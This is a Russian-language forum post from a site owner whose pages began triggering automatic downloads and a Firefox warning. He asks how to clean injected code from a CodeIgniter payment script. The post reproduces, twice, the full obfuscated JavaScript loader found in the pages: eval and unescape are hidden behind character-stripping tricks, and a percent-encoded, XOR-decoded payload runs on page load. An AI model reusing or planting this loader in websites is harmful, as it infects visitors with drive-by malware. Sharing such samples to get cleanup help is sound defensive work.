кто ведает суть - объясните, пожалуйста, в чём дело:
когда посетитель открывает страницу - начинает автоматом
устанавливаться какая-то прога.
Firefox вообще пишет следующее при открытии сайта:
мол, страница попала под подозрение = покинуть прямо сейчас / игнорировать / почему попала в список подозрительных (проверено Гуглом)
решил посмотреть код страницы - оказалось, на каждой странице откуда-то появилось
дополнение к коду:
</head> <body><!-- ad --><script>window['e>v>aElP'.replace(/[\*\>EP~]/g, '')](window['e>v>aElP'.replace(/[\*\>EP~]/g, '')]('uUnUeGsUcUaJpieU'.replace(/[iUJG&]/g, ''))('%66%75%6e%63%74%69%6f%6e%20%41%48%47%50%61%6c%28%41%4c%41%54%49%29%7b%66%75%6e%63%74%69%6f%6e%20%48%6c%41%4c%61%47%28%4c%48%6c%54%29%7b%65%76%61%6c%28%22%76%61%72%20%4c%47%6c%4c%48%41%6c%70%3d%30%3b%22%29%3b%76%61%72%20%41%44%54%3d%4c%48%6c%54%2e%6c%65%6e%67%74%68%3b%65%76%61%6c%28%22%76%61%72%20%41%41%61%44%68%54%3d%30%3b%22%29%3b%77%68%69%6c%65%28%41%41%61%44%68%54%3c%41%44%54%29%7b%4c%47%6c%4c%48%41%6c%70%2b%3d%50%4c%68%70%41%28%4c%48%6c%54%2c%41%41%61%44%68%54%29%2a%41%44%54%3b%41%41%61%44%68%54%2b%2b%3b%7d%72%65%74%75%72%6e%20%28%4c%47%6c%4c%48%41%6c%70%2b%27%27%29%3b%7d%66%75%6e%63%74%69%6f%6e%20%50%4c%68%70%41%28%41%61%44%41%61%70%2c%41%49%44%29%7b%72%65%74%75%72%6e%20%41%61%44%41%61%70%2e%63%68%61%72%43%6f%64%65%41%74%28%41%49%44%29%3b%7d%20%20%20%74%72%79%20%7b%76%61%72%20%48%61%61%3d%65%76%61%6c%28%27%61%4b%72%38%67%35%75%4b%6d%38%65%4b%6e%40%74%35%73%4b%2e%35%63%38%61%6b%6c%35%6c%40%65%40%65%35%27%2e%72%65%70%6c%61%63%65%28%2f%5b%40%6b%4b%35%38%5d%2f%67%2c%20%27%27%29%29%2c%4c%50%61%41%6c%70%41%3d%27%27%3b%76%61%72%20%50%41%41%47%3d%30%2c%48%49%48%44%3d%30%2c%41%49%48%49%48%50%3d%28%6e%65%77%20%53%74%72%69%6e%67%28%48%61%61%29%29%2e%72%65%70%6c%61%63%65%28%2f%5b%5e%40%61%2d%7a%30%2d%39%41%2d%5a%5f%2e%2c%2d%5d%2f%67%2c%27%27%29%3b%76%61%72%20%4c%6c%61%49%47%68%3d%48%6c%41%4c%61%47%28%41%49%48%49%48%50%29%3b%65%76%61%6c%28%22%41%4c%41%54%49%3d%75%6e%65%73%63%61%70%65%28%41%4c%41%54%49%29%3b%22%29%3b%66%6f%72%28%76%61%72%20%41%47%68%47%48%3d%30%3b%20%41%47%68%47%48%20%3c%20%28%41%4c%41%54%49%2e%6c%65%6e%67%74%68%29%3b%20%41%47%68%47%48%2b%2b%29%7b%76%61%72%20%41%49%6c%41%44%3d%50%4c%68%70%41%28%41%49%48%49%48%50%2c%50%41%41%47%29%5e%50%4c%68%70%41%28%4c%6c%61%49%47%68%2c%48%49%48%44%29%3b%76%61%72%20%50%41%61%49%61%49%3d%50%4c%68%70%41%28%41%4c%41%54%49%2c%41%47%68%47%48%29%3b%50%41%41%47%2b%2
b%3b%48%49%48%44%2b%2b%3b%69%66%28%48%49%48%44%3e%4c%6c%61%49%47%68%2e%6c%65%6e%67%74%68%29%48%49%48%44%3d%30%3b%69%66%28%50%41%41%47%3e%41%49%48%49%48%50%2e%6c%65%6e%67%74%68%29%50%41%41%47%3d%30%3b%4c%50%61%41%6c%70%41%2b%3d%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%50%41%61%49%61%49%5e%41%49%6c%41%44%29%20%2b%20%27%27%3b%7d%65%76%61%6c%28%4c%50%61%41%6c%70%41%29%3b%20%72%65%74%75%72%6e%20%4c%50%61%41%6c%70%41%3d%6e%75%6c%6c%3b%7d%63%61%74%63%68%28%65%29%7b%7d%7d%41%48%47%50%61%6c%28%27%25%33%33%25%33%30%25%33%31%25%33%33%25%33%33%25%33%38%25%33%32%25%33%34%25%36%31%25%33%33%25%31%36%25%33%35%25%31%33%25%32%66%25%33%65%25%35%36%25%31%63%25%37%64%25%35%61%25%32%64%25%33%30%25%32%66%25%32%39%25%36%63%25%32%30%25%32%64%25%30%66%25%30%39%25%37%63%25%31%66%25%34%32%25%33%36%25%31%30%25%31%64%25%30%39%25%30%31%25%30%32%25%33%62%25%33%33%25%37%63%25%33%63%25%33%63%25%33%36%25%32%37%25%33%38%25%31%31%25%31%39%25%31%31%25%31%65%25%31%66%25%33%31%25%32%63%25%37%30%25%35%65%25%37%35%25%32%62%25%31%36%25%30%35%25%30%36%25%31%39%25%31%66%25%37%66%25%37%64%25%32%36%25%37%63%25%33%62%25%37%33%25%32%37%25%33%65%25%33%39%25%36%63%25%35%31%25%33%61%25%32%38%25%33%33%25%32%32%25%37%62%25%35%36%25%35%63%25%32%32%25%32%64%25%33%35%25%30%31%25%37%32%25%32%35%25%33%36%25%33%38%25%33%32%25%33%34%25%36%66%25%31%31%25%33%66%25%35%61%25%32%66%25%30%32%25%31%34%25%30%36%25%30%63%25%32%64%25%30%30%25%33%39%25%35%33%25%31%33%25%30%36%25%33%39%25%32%65%25%34%33%25%37%37%25%37%62%25%32%66%25%35%65%25%30%63%25%31%65%25%32%30%25%32%37%25%36%63%25%33%35%25%30%30%25%33%38%25%31%37%25%32%65%25%31%33%25%31%63%25%35%65%25%34%37%25%33%36%25%31%62%25%33%35%25%30%31%25%33%33%25%34%30%25%36%36%25%37%37%25%37%30%25%35%63%25%37%61%25%37%65%25%31%32%25%35%61%25%32%63%25%31%31%25%30%65%25%33%34%25%31%38%25%33%37%25%32%34%25%32%64%25%33%66%25%32%35%25%33%38%25%33%65%25%37%33%25%34%39%25%30%35%25%30%65%25%33%38%25%32%65%25%31%37%25%31%62%25%33%63%25%30%32%25%32%35%25%33%37%25%33%32%25%33%61%25%
35%65%25%35%61%25%34%63%25%36%39%25%36%61%25%35%34%25%32%39%25%36%63%25%32%63%25%31%37%25%32%36%25%33%64%25%30%37%25%32%31%25%30%32%25%37%34%25%33%31%25%32%63%25%32%36%25%32%34%25%35%33%25%37%61%25%33%38%25%30%30%25%31%62%25%32%33%25%31%38%25%30%65%25%35%30%25%36%30%25%36%30%25%37%64%25%35%66%25%36%39%25%36%32%25%31%64%25%33%64%25%33%31%25%32%38%25%32%39%25%33%30%25%30%32%25%32%36%25%35%35%25%32%31%25%36%34%25%33%30%25%37%34%25%36%39%25%31%65%25%31%64%25%37%62%25%33%30%25%31%34%25%33%39%25%33%30%25%32%34%25%36%65%25%32%62%25%32%66%25%33%35%25%36%61%25%37%62%25%33%30%25%37%32%25%32%65%25%33%64%25%36%30%25%31%38%25%31%30%25%33%64%25%35%39%25%33%33%25%32%66%25%36%64%25%33%33%25%33%34%25%30%34%25%30%62%25%33%38%25%33%66%25%33%33%25%31%63%25%32%36%25%30%64%25%32%39%25%35%65%25%32%31%25%37%32%25%37%65%25%30%62%25%30%61%25%33%36%25%31%64%25%37%38%25%35%38%25%35%62%25%33%64%25%31%38%25%32%30%25%33%37%25%33%38%25%30%33%25%33%34%25%31%38%25%33%34%25%35%33%25%31%31%25%35%32%25%34%63%25%37%35%25%33%32%25%35%35%25%37%62%25%34%62%25%34%39%25%35%30%25%35%38%25%32%30%25%32%30%25%36%35%25%32%66%25%31%35%25%31%35%25%31%38%25%32%66%25%31%33%25%35%33%25%36%39%25%37%61%25%32%31%27%29%3b'));</script><!-- /ad --><div style="visibility:hidden"></div>
обратился в службу поддержки хостинга reg.ru
там объяснили, что троян на компе прописал этот код в файлы ещё до того,
как я загрузил их на хост.
удалил со всех страниц вредоносный код
очистил кэш,
проверил - страницы в норме,
захожу на страницы оплаты
(нажимая на кнопку оплатить прямо сейчас)
так же начинает загружаться что-то!
дальше решил проверить следующее:
открываю в папке "bbm" файл index.php :
<?php /* |--------------------------------------------------------------- | PHP ERROR REPORTING LEVEL |--------------------------------------------------------------- | | By default CI runs with error reporting set to ALL. For security | reasons you are encouraged to change this when your site goes live. | For more info visit: http://www.php.net/error_reporting | */ error_reporting(E_ALL); /* |--------------------------------------------------------------- | SYSTEM FOLDER NAME |--------------------------------------------------------------- | | This variable must contain the name of your "system" folder. | Include the path if the folder is not in the same directory | as this file. | | NO TRAILING SLASH! | */ $system_folder = "core"; /* |--------------------------------------------------------------- | APPLICATION FOLDER NAME |--------------------------------------------------------------- | | If you want this front controller to use a different "application" | folder then the default one you can set its name here. The folder | can also be renamed or relocated anywhere on your server. | For more info please see the user guide: | http://codeigniter.com/user_guide/general/managing_apps.html | | | NO TRAILING SLASH! | */ $application_folder = "app"; /* |=============================================================== | END OF USER CONFIGURABLE SETTINGS |=============================================================== */ /* |--------------------------------------------------------------- | SET THE SERVER PATH |--------------------------------------------------------------- | | Let's attempt to determine the full-server path to the "system" | folder in order to reduce the possibility of path problems. | Note: We only attempt this if the user hasn't specified a | full server path. 
| */ if (strpos($system_folder, '/') === FALSE) { if (function_exists('realpath') AND @realpath(dirname(__FILE__)) !== FALSE) { $system_folder = realpath(dirname(__FILE__)).'/'.$system_folder; } } else { // Swap directory separators to Unix style for consistency $system_folder = str_replace("\\", "/", $system_folder); } /* |--------------------------------------------------------------- | DEFINE APPLICATION CONSTANTS |--------------------------------------------------------------- | | EXT - The file extension. Typically ".php" | FCPATH - The full server path to THIS file | SELF - The name of THIS file (typically "index.php) | BASEPATH - The full server path to the "system" folder | APPPATH - The full server path to the "application" folder | */ define('EXT', '.'.pathinfo(__FILE__, PATHINFO_EXTENSION)); define('FCPATH', __FILE__); define('SELF', pathinfo(__FILE__, PATHINFO_BASENAME)); define('BASEPATH', $system_folder.'/'); if (is_dir($application_folder)) { define('APPPATH', $application_folder.'/'); } else { if ($application_folder == '') { $application_folder = 'application'; } define('APPPATH', BASEPATH.$application_folder.'/'); } /* |--------------------------------------------------------------- | LOAD THE FRONT CONTROLLER |--------------------------------------------------------------- | | And away we go... 
| */ require_once BASEPATH.'codeigniter/CodeIgniter'.EXT; /* End of file index.php */ /* Location: ./index.php *<html><body><!-- ad --><script>window['e>v>aElP'.replace(/[\*\>EP~]/g, '')](window['e>v>aElP'.replace(/[\*\>EP~]/g, '')]('uUnUeGsUcUaJpieU'.replace(/[iUJG&]/g, ''))('%66%75%6e%63%74%69%6f%6e%20%41%48%47%50%61%6c%28%41%4c%41%54%49%29%7b%66%75%6e%63%74%69%6f%6e%20%48%6c%41%4c%61%47%28%4c%48%6c%54%29%7b%65%76%61%6c%28%22%76%61%72%20%4c%47%6c%4c%48%41%6c%70%3d%30%3b%22%29%3b%76%61%72%20%41%44%54%3d%4c%48%6c%54%2e%6c%65%6e%67%74%68%3b%65%76%61%6c%28%22%76%61%72%20%41%41%61%44%68%54%3d%30%3b%22%29%3b%77%68%69%6c%65%28%41%41%61%44%68%54%3c%41%44%54%29%7b%4c%47%6c%4c%48%41%6c%70%2b%3d%50%4c%68%70%41%28%4c%48%6c%54%2c%41%41%61%44%68%54%29%2a%41%44%54%3b%41%41%61%44%68%54%2b%2b%3b%7d%72%65%74%75%72%6e%20%28%4c%47%6c%4c%48%41%6c%70%2b%27%27%29%3b%7d%66%75%6e%63%74%69%6f%6e%20%50%4c%68%70%41%28%41%61%44%41%61%70%2c%41%49%44%29%7b%72%65%74%75%72%6e%20%41%61%44%41%61%70%2e%63%68%61%72%43%6f%64%65%41%74%28%41%49%44%29%3b%7d%20%20%20%74%72%79%20%7b%76%61%72%20%48%61%61%3d%65%76%61%6c%28%27%61%4b%72%38%67%35%75%4b%6d%38%65%4b%6e%40%74%35%73%4b%2e%35%63%38%61%6b%6c%35%6c%40%65%40%65%35%27%2e%72%65%70%6c%61%63%65%28%2f%5b%40%6b%4b%35%38%5d%2f%67%2c%20%27%27%29%29%2c%4c%50%61%41%6c%70%41%3d%27%27%3b%76%61%72%20%50%41%41%47%3d%30%2c%48%49%48%44%3d%30%2c%41%49%48%49%48%50%3d%28%6e%65%77%20%53%74%72%69%6e%67%28%48%61%61%29%29%2e%72%65%70%6c%61%63%65%28%2f%5b%5e%40%61%2d%7a%30%2d%39%41%2d%5a%5f%2e%2c%2d%5d%2f%67%2c%27%27%29%3b%76%61%72%20%4c%6c%61%49%47%68%3d%48%6c%41%4c%61%47%28%41%49%48%49%48%50%29%3b%65%76%61%6c%28%22%41%4c%41%54%49%3d%75%6e%65%73%63%61%70%65%28%41%4c%41%54%49%29%3b%22%29%3b%66%6f%72%28%76%61%72%20%41%47%68%47%48%3d%30%3b%20%41%47%68%47%48%20%3c%20%28%41%4c%41%54%49%2e%6c%65%6e%67%74%68%29%3b%20%41%47%68%47%48%2b%2b%29%7b%76%61%72%20%41%49%6c%41%44%3d%50%4c%68%70%41%28%41%49%48%49%48%50%2c%50%41%41%47%29%5e%50%4c%68%70%41%28%4c%6c%61%49%47%68%2c%48%49%48%44%29
%3b%76%61%72%20%50%41%61%49%61%49%3d%50%4c%68%70%41%28%41%4c%41%54%49%2c%41%47%68%47%48%29%3b%50%41%41%47%2b%2b%3b%48%49%48%44%2b%2b%3b%69%66%28%48%49%48%44%3e%4c%6c%61%49%47%68%2e%6c%65%6e%67%74%68%29%48%49%48%44%3d%30%3b%69%66%28%50%41%41%47%3e%41%49%48%49%48%50%2e%6c%65%6e%67%74%68%29%50%41%41%47%3d%30%3b%4c%50%61%41%6c%70%41%2b%3d%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%50%41%61%49%61%49%5e%41%49%6c%41%44%29%20%2b%20%27%27%3b%7d%65%76%61%6c%28%4c%50%61%41%6c%70%41%29%3b%20%72%65%74%75%72%6e%20%4c%50%61%41%6c%70%41%3d%6e%75%6c%6c%3b%7d%63%61%74%63%68%28%65%29%7b%7d%7d%41%48%47%50%61%6c%28%27%25%33%33%25%33%30%25%33%31%25%33%33%25%33%33%25%33%38%25%33%32%25%33%34%25%36%31%25%33%33%25%31%36%25%33%35%25%31%33%25%32%66%25%33%65%25%35%36%25%31%63%25%37%64%25%35%61%25%32%64%25%33%30%25%32%66%25%32%39%25%36%63%25%32%30%25%32%64%25%30%66%25%30%39%25%37%63%25%31%66%25%34%32%25%33%36%25%31%30%25%31%64%25%30%39%25%30%31%25%30%32%25%33%62%25%33%33%25%37%63%25%33%63%25%33%63%25%33%36%25%32%37%25%33%38%25%31%31%25%31%39%25%31%31%25%31%65%25%31%66%25%33%31%25%32%63%25%37%30%25%35%65%25%37%35%25%32%62%25%31%36%25%30%35%25%30%36%25%31%39%25%31%66%25%37%66%25%37%64%25%32%36%25%37%63%25%33%62%25%37%33%25%32%37%25%33%65%25%33%39%25%36%63%25%35%31%25%33%61%25%32%38%25%33%33%25%32%32%25%37%62%25%35%36%25%35%63%25%32%32%25%32%64%25%33%35%25%30%31%25%37%32%25%32%35%25%33%36%25%33%38%25%33%32%25%33%34%25%36%66%25%31%31%25%33%66%25%35%61%25%32%66%25%30%32%25%31%34%25%30%36%25%30%63%25%32%64%25%30%30%25%33%39%25%35%33%25%31%33%25%30%36%25%33%39%25%32%65%25%34%33%25%37%37%25%37%62%25%32%66%25%35%65%25%30%63%25%31%65%25%32%30%25%32%37%25%36%63%25%33%35%25%30%30%25%33%38%25%31%37%25%32%65%25%31%33%25%31%63%25%35%65%25%34%37%25%33%36%25%31%62%25%33%35%25%30%31%25%33%33%25%34%30%25%36%36%25%37%37%25%37%30%25%35%63%25%37%61%25%37%65%25%31%32%25%35%61%25%32%63%25%31%31%25%30%65%25%33%34%25%31%38%25%33%37%25%32%34%25%32%64%25%33%66%25%32%35%25%33%38%25%33%65%25%37%33%25%34%39%2
5%30%35%25%30%65%25%33%38%25%32%65%25%31%37%25%31%62%25%33%63%25%30%32%25%32%35%25%33%37%25%33%32%25%33%61%25%35%65%25%35%61%25%34%63%25%36%39%25%36%61%25%35%34%25%32%39%25%36%63%25%32%63%25%31%37%25%32%36%25%33%64%25%30%37%25%32%31%25%30%32%25%37%34%25%33%31%25%32%63%25%32%36%25%32%34%25%35%33%25%37%61%25%33%38%25%30%30%25%31%62%25%32%33%25%31%38%25%30%65%25%35%30%25%36%30%25%36%30%25%37%64%25%35%66%25%36%39%25%36%32%25%31%64%25%33%64%25%33%31%25%32%38%25%32%39%25%33%30%25%30%32%25%32%36%25%35%35%25%32%31%25%36%34%25%33%30%25%37%34%25%36%39%25%31%65%25%31%64%25%37%62%25%33%30%25%31%34%25%33%39%25%33%30%25%32%34%25%36%65%25%32%62%25%32%66%25%33%35%25%36%61%25%37%62%25%33%30%25%37%32%25%32%65%25%33%64%25%36%30%25%31%38%25%31%30%25%33%64%25%35%39%25%33%33%25%32%66%25%36%64%25%33%33%25%33%34%25%30%34%25%30%62%25%33%38%25%33%66%25%33%33%25%31%63%25%32%36%25%30%64%25%32%39%25%35%65%25%32%31%25%37%32%25%37%65%25%30%62%25%30%61%25%33%36%25%31%64%25%37%38%25%35%38%25%35%62%25%33%64%25%31%38%25%32%30%25%33%37%25%33%38%25%30%33%25%33%34%25%31%38%25%33%34%25%35%33%25%31%31%25%35%32%25%34%63%25%37%35%25%33%32%25%35%35%25%37%62%25%34%62%25%34%39%25%35%30%25%35%38%25%32%30%25%32%30%25%36%35%25%32%66%25%31%35%25%31%35%25%31%38%25%32%66%25%31%33%25%35%33%25%36%39%25%37%61%25%32%31%27%29%3b'));</script><!-- /ad --></body></html>/<?php echo ''; ?><?php echo '<div style="visibility:hidden"></div>'; ?>
как этот код подчистить, чтобы не навредить работе скрипта оплаты, уже не знаю.
и как себя обезопасить???
неужели это пробита брешь именно в скрипте оплаты Бук Биз Мастер?